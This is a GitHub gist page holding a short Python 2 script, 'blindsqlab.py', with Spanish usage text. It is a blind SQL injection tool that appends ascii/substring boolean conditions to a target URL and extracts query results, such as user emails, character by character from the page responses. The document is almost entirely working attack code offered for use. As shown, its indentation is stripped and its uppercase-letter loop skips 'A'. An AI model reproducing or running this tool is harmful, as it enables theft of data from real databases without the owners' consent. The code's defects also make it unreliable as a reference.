Skip to content

Instantly share code, notes, and snippets.

@AngelGzS

AngelGzS/blindsqlab.py

Created May 26, 2011 04:02
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save AngelGzS/992528 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save AngelGzS/992528 to your computer and use it in GitHub Desktop.
Download ZIP
Blind Sql Tool
Raw
blindsqlab.py
# -*- coding: iso-8859-1 -*-
import re
import urllib
import urllib2
import sys
import cookielib
from socket import ssl
import os
ua = "Mozilla/5.0 (compatible; Konqueror/3.5.8; Linux)"
h = {"User-Agent" : ua}
usage = "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"
usage += "usage: %s \"url\" \"consulta sql\" \n" % sys.argv[0]
usage += "ejemplo: %s \"wwww.dominio.com/archvio.php?c=1\" \"SELECT email FROM usuarios limit 1,1\" \"Texto verdadero\" \n" % sys.argv[0]
usage += "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"
if len(sys.argv) < 4:
print usage
exit()
hsh = urllib2.HTTPSHandler()
cookie_h = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookie_h,hsh,urllib2.HTTPCookieProcessor())
urllib2.install_opener(opener)
url = sys.argv[1]
param = sys.argv[2]
sql = param.replace(" ", "%20")
cierto = sys.argv[3]
def mayor():
request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>"+str(y)+"")
if request.read().find(cierto) != -1:
return 1
def menor():
request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))<"+str(y)+"")
if request.read().find(cierto) != -1:
return 1
def salida():
request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=0")
if request.read().find(cierto) != -1:
return 0
def acierto():
request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))="+str(y)+"")
if request.read().find(cierto) != -1:
return 1
def numero():
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=48%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=57"
#print sqlz
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
return 1
def letrama():
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=65%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=90"
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
return 1
def letrami():
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=97%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=122"
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
return 1
x=0
y=0
strx=""
try:
x=0
for i in range(50):
x=x+1
sqlz = url+"%20and%20length(("+sql+"))<" + str(x)
request = opener.open(sqlz)
os.system('clear')
print "caracteres encontrados: "+strx
if request.read().find(cierto) != -1:
#print "wtf yaaa"
break
if letrami():
#print "es letra minuscula"
y=96
for i in range(27):
y=y+1
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
#print "yeee caracter encontrado = " + chr(y)
strx=strx+chr(y)
break
elif numero():
#print "es numero"
y=47
for i in range(10):
y=y+1
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
#print "yeee caracter encontrado = " + chr(y)
strx=strx+chr(y)
break
elif letrama():
#print "es letra mayuscula"
y=65
for i in range(27):
y=y+1
sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
request = opener.open(sqlz)
if request.read().find(cierto) != -1:
#print "yeee caracter encontrado = " + chr(y)
strx=strx+chr(y)
break
except KeyboardInterrupt:
print "\n Cierro"
print "caracteres encontrados: " + strx
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment